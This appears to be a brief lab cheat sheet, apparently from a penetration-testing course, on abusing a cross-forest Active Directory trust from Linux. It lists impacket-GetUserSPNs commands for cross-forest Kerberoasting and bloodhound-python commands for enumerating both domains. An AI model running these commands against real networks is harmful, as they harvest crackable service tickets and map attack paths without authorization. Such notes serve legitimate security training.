cross-forest-trust-abuse-from-linux

Cross forest Kerberoasting attack (initial access)

GetUserSpn

impacket-GetUserSPNs -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

impacket-GetUserSPNs -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

/etc/resolv.conf

Domain INLANEFREIGHT.LOCAL

Nameserver 172.16.5.5

bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u <username@<domain_dc> -p <pass>

Running bloodhound-python against INLANELOGISTICS.LOCAL

Add DNS entry

bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -c All -u <username>@inlanefreight.local -p <pass>

Dangerous rights > "users with foreign domain group membership" under the analysis tab

Last updated 1 month ago